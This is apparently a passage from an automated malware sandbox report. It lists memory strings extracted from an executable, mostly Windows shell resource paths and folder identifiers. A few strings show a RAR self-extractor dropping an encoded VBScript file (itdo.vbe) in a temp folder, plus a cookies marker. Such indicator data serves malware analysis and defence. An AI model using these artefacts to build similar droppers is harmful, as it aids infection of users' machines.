                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftdmemstr_c7bc9b65-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .microsoftmemstr_ee4ba6f0-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_811df3e6-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows@memstr_adaa5dcf-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .windowsmemstr_9e00163a-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librariesdmemstr_4cd74666-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .librariesmemstr_b1a67d4e-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-181memstr_6301c5ba-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\application shortcutsmemstr_806ccc84-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-3lmemstr_d30065c3-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-183gmemstr_66ef55d5-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloads\desktop.inimmemstr_d92b407a-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-184smemstr_57195bce-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documents\desktop.inimemstr_0dd87f0b-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\pictures\desktop.inimemstr_48b2c3a4-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-2/memstr_85d212c1-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\desktop.ini5memstr_beedd963-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-6memstr_19a64147-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-113memstr_cb27ae1c-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-3memstr_c47659dd-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-198memstr_7e0862f3-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-115memstr_ef7c17ae-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllmemstr_fb4eb53b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-18memstr_a6b1026f-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-4memstr_fe86958c-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllmemstr_304fd495-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-108imemstr_62ad93b8-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-189dmemstr_aeb2a453-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-189_memstr_ff105baa-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-108jmemstr_02e7f629-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-5ememstr_2bed74f0-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-1pmemstr_ea9a727d-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-117memstr_1b99a2e2-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\contacts\desktop.inimemstr_2e6ddad6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\devicemetadatastorememstr_4e691f23-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\searches\desktop.ini'memstr_6764968e-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites\desktop.ini2memstr_983251fa-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-3memstr_07393d13-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-185memstr_54d41fdd-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-184memstr_cc60b4cc-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-8memstr_c18c9216-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-112memstr_7343c6ec-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-186memstr_ea46c156-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicmemstr_803c59ac-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: music<memstr_24c8cd8b-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .musicmemstr_7403abe3-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{088e3905-0323-4b02-9826-5d99428e115f}memstr_a96f2ed0-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21790memstr_2940e402-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12689memstr_18c75e64-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-108memstr_a78fb26b-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-237memstr_451d392a-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cookies=memstr_e34d50c7-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendto0memstr_2014a961-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup3memstr_268bd4c8-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videos6memstr_90645ad7-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librarymemstr_90e09ef9-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: historymemstr_e03c4ae0-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videosmemstr_0aa0f70b-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nethoodmemstr_b45dcba8-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonmemstr_8cfb9442-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21797memstr_273449a1-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21813jmemstr_ad9c648b-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21787fmemstr_80eba293-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{645ff040-5081-101b-9f08-00aa002f954e}rmemstr_b738915b-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21782nmemstr_9e46365d-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlllhnmemstr_1e9a4b20-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690vmemstr_b210af51-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12688memstr_acd10e1e-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21782*memstr_94fca550-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690&memstr_55b73885-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-10042memstr_013ab305-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21786memstr_ae7ed922-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\internet explorer\quick launchmemstr_a11558e9-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21804memstr_21db123c-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{031e4825-7b94-4dc3-b131-e946b44c8dd5}memstr_07cfacbf-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{b4fb3f98-c1ea-428d-a78a-d1f5659cba93}memstr_7b493517-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21815memstr_aea19634-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1013memstr_ff54390d-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1005memstr_0aa690e3-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21796memstr_8af0488b-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21762memstr_2ebeeddf-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12689memstr_eb60fee7-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{871c5380-42a0-1069-a2ea-08002b30309d}bmemstr_b427e175-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690^memstr_0080d681-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllljmemstr_6ee39544-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{20d04fe0-3aea-1069-a2d8-08002b30309d}fmemstr_d529c7fc-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21762rmemstr_e2fdd182-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-50704memstr_a23660f7-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21769memstr_966464de-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21799memstr_e1702a7b-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1002"memstr_aec89e51-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1(zizmemstr_ff5445c6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0memstr_f887913a-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0@memstr_903df599-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (z`z(ziz.memstr_6758e116-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (z`z(ziz.qmemstr_34b4c98f-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlllmemstr_e830a695-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-9031memstr_4327e4b8-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21791memstr_e4cec498-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690memstr_365e6f2d-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21798memstr_1bbd6da9-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1040memstr_9221785c-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}memstr_52c93b84-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videos>memstr_654647b6-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .videosmemstr_8e2809c7-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}memstr_825eaee0-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21779memstr_2ca45517-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688memstr_d70e3db8-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-113memstr_50a259cf-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-236memstr_c85ecee9-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{7d1d3a04-debb-4115-95cf-2f29da2920da}memstr_96a54066-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21791memstr_7e164cfb-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690memstr_fdaec407-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-189memstr_6edbbe60-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-238memstr_fb0557d7-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsmemstr_bb9840f7-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsdmemstr_3293b5e1-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .downloadsmemstr_a0705d67-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}memstr_1e2a6d8d-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21798memstr_19181ba2-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-184memstr_0d6751a6-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0\itdo.vbe1memstr_5fe97043-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\memstr_483e2375-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21790memstr_e5e4034e-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{89d83576-6bd1-4c86-9454-beb04e94c819}\*memstr_3ae64954-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34575memstr_0a5eecdb-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21818memstr_4e73333b-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34582memstr_febe5f02-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wt0 wtmemstr_30cac00a-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\settingsynccore.dll,-1024memstr_59a358c1-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{bd7a2e7b-21cb-41b2-a086-b309680c6b7e}\*memstr_c2a68e72-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%commonprogramfiles%\system\wab32res.dll,-10200mmemstr_8ae406c9-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34583[memstr_24e2fba6-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34584imemstr_9914fe9a-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21791gmemstr_02c8f536-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21798umemstr_ed465f56-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21829memstr_400c8ec3-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21824memstr_e32629a5-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34620/memstr_c2eb28f0-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcememstr_ecba8aae-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\onedrive\onedrive.exe,1memstr_dd330cfc-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcec:\users\user\appdata\local\microsoft\onedrive\onedrive.exe,1memstr_4eba08fb-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34583memstr_390aac59-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21825memstr_c041cade-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21823memstr_18e63bf5-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21826memstr_03468388-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-34595memstr_5baeea4d-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21827memstr_67d0890b-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21770imemstr_b58eb0c3-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21779gmemstr_3a9d9073-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%commonprogramfiles%\system\wab32res.dll,-10100umemstr_175fdb19-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\cmemstr_be6d8b5c-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\qmemstr_956bd7e5-d
